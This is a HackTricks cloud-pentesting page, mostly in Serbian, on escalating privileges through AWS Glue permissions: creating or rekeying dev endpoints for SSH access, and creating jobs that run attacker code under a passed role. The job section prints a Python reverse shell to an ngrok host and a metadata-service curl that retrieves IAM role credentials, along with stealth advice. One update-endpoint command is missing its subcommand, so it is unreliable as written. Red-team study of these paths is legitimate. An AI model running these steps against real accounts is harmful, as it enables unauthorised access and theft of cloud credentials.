AWS - Glue Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

glue

`iam:PassRole`, `glue:CreateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`)

Korisnici sa ovim dozvolama mogu postaviti novu AWS Glue razvojnu tačku, dodeljujući postojeću servisnu ulogu koju Glue može preuzeti sa specifičnim dozvolama ovoj tački.

Nakon postavljanja, napadač može SSH-ovati u instancu tačke, i ukrasti IAM akreditive dodeljene ulozi:

# Create endpoint
aws glue create-dev-endpoint --endpoint-name <endpoint-name> \
--role-arn <arn-role> \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

Za svrhe prikrivanja, preporučuje se korišćenje IAM kredencijala iznutra Glue virtuelne mašine.

Potencijalni uticaj: Privesc na ulogu servisa glue koja je navedena.

`glue:UpdateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`)

Korisnici sa ovom dozvolom mogu promeniti postojeći Glue razvojni endpoint SSH ključ, omogućavajući SSH pristup njemu. Ovo omogućava napadaču da izvršava komande sa privilegijama uloge koja je povezana sa endpoint-om:

# Change public key to connect
aws glue --endpoint-name target_endpoint \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

Potencijalni Uticaj: Privesc na ulogu servisa glue koja se koristi.

`iam:PassRole`, (`glue:CreateJob` | `glue:UpdateJob`), (`glue:StartJobRun` | `glue:CreateTrigger`)

Korisnici sa iam:PassRole u kombinaciji sa bilo kojim od glue:CreateJob ili glue:UpdateJob, i bilo kojim od glue:StartJobRun ili glue:CreateTrigger mogu napraviti ili ažurirati AWS Glue posao, pridružujući bilo koji Glue servisni nalog, i pokrenuti izvršenje posla. Mogućnosti posla uključuju izvršavanje proizvoljnog Python koda, što se može iskoristiti za uspostavljanje reverzibilne ljuske. Ova reverzibilna ljuska se zatim može koristiti za eksfiltraciju IAM kredencijala uloge pridružene Glue poslu, što može dovesti do potencijalnog neovlašćenog pristupa ili radnji na osnovu dozvola te uloge:

# Content of the python script saved in s3:
#import socket,subprocess,os
#s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#s.connect(("2.tcp.ngrok.io",11216))
#os.dup2(s.fileno(),0)
#os.dup2(s.fileno(),1)
#os.dup2(s.fileno(),2)
#p=subprocess.call(["/bin/sh","-i"])
#To get the IAM Role creds run: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy


# A Glue role with admin access was created
aws glue create-job \
--name privesctest \
--role arn:aws:iam::93424712358:role/GlueAdmin \
--command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}'

# You can directly start the job
aws glue start-job-run --job-name privesctest
# Or you can create a trigger to start it
aws glue create-trigger --name triggerprivesc --type SCHEDULED \
--actions '[{"JobName": "privesctest"}]' --start-on-creation \
--schedule "0/5 * * * * *"  #Every 5mins, feel free to change

Potencijalni Uticaj: Privesc na ulogu glue servisa koja je specificirana.

`glue:UpdateJob`

Samo sa dozvolom za ažuriranje, napadač bi mogao da ukrade IAM kredencijale već prikačene uloge.

Potencijalni Uticaj: Privesc na ulogu glue servisa koja je prikačena.

Reference

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - Gamelift NextAWS - IAM Privesc

Last updated 3 days ago

glue

iam:PassRole, glue:CreateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

glue:UpdateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

iam:PassRole, (glue:CreateJob | glue:UpdateJob), (glue:StartJobRun | glue:CreateTrigger)

glue:UpdateJob

Reference

glue

iam:PassRole, glue:CreateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

glue:UpdateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

iam:PassRole, (glue:CreateJob | glue:UpdateJob), (glue:StartJobRun | glue:CreateTrigger)

glue:UpdateJob

Reference

`iam:PassRole`, `glue:CreateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`)

`glue:UpdateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`)

`iam:PassRole`, (`glue:CreateJob` | `glue:UpdateJob`), (`glue:StartJobRun` | `glue:CreateTrigger`)

`glue:UpdateJob`

`iam:PassRole`, `glue:CreateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`)

`glue:UpdateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`)

`iam:PassRole`, (`glue:CreateJob` | `glue:UpdateJob`), (`glue:StartJobRun` | `glue:CreateTrigger`)

`glue:UpdateJob`